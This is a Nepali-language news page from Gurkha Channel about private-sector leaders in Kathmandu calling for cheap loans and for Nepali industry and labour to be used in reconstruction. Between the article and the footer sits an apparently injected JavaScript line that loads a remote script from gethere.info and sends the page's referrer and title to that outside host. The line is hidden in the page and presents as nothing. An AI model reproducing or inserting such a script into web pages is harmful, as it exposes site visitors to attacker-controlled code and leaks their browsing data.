नीजी क्षेत्र

Oman Gauchan "Hanson" Avatar

अर्थतन्त्रलाई मजबुत बनाउनका लागि नीजि क्षेत्रले सहुलियत ऋणको माग गर्नुका साथै नेपाली उद्योग र नेपाली जनशक्ति परिचालन गर्न माग गरेको छ। सस्तो व्याजमा उद्योग व्यवसायीलाई ऋण प्रवाह नगरे नीजि क्षेत्रले कर, राजश्व तिर्न नसक्ने अबस्थामा रहेको उनीहरुको भनाई छ। मिडिया इन्टरनेसनलले बुधबार काठमाडौंमा आयोजना गरेको कार्यक्रममा नेपाल उद्योग वाणिज्य महासंघ उद्योग समितिका सभापति उमेशलाल श्रेष्ठले पुननिर्माणको कार्यमा नेपाली उद्योग, नेपाली सामान र नेपाली कामदारको परिचालन गर्नुपर्ने बताए । उनले पुननिर्माणमा विदेशी संस्था र विदेशी व्यक्तिलाई ठेक्का दिन नहुने बताउनुभयो।

कार्यक्रममा नेपाल चेम्बर अफ कमर्शका उपाध्यक्ष राजेन्द्र मल्लले सस्तो व्याजमा ऋण दिने र हालको बैंक व्याजलाई केही पर धकेल्नका लागि सरकारले सहयोग गर्नुपर्ने मुख्य आवश्यकता रहेको बताउनुभयो। कार्यक्रममा ट्रेकिङ एजेन्स एसोसीयसन अफ नेपाल टान का महासचिव सागर पाण्डेले पर्यटन क्षेत्र सबैभन्दा महत्वपूण उद्योगका रुपमा स्थापीत भइसकेका कारण यसको मजबुतिका लागि सरकार गम्भिर हुनुपर्ने धारणा राख्नुभयो। कार्यक्रममा खुद्रा व्यापार संघका अध्यक्ष पवित्र बज्राचार्य, फूटवेयर एसोशियसनका अध्यक्ष रविनकुमार श्रेष्ठ लगायतले नीजि क्षेत्रबाट लिने कर र राजश्वबाटै देशको अर्थतन्त्र चलायमान भएका कारण नीजि क्षेत्रलाई उद्योग व्यापार संचालन गर्न राज्यको सहयोग आवश्यक रहेको बताएका थिए।

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Oman Gauchan "Hanson" Avatar
About Gurkha Channel

Gurkha channel is the sister company of Gurkha TV and the first 24-hour Nepali channel operating from the international capital of the world,London, United Kingdom. Gurkha Channels believes in honesty, respect, and unity. We belong to the land of Lord Buddha, Mt. Everest, and gallant people who sacrifice their lives for peace and humanity. Therefore, in this world of globalization, it is our effort to bring all Nepalese from around the world together and make one family: one Nation.

Search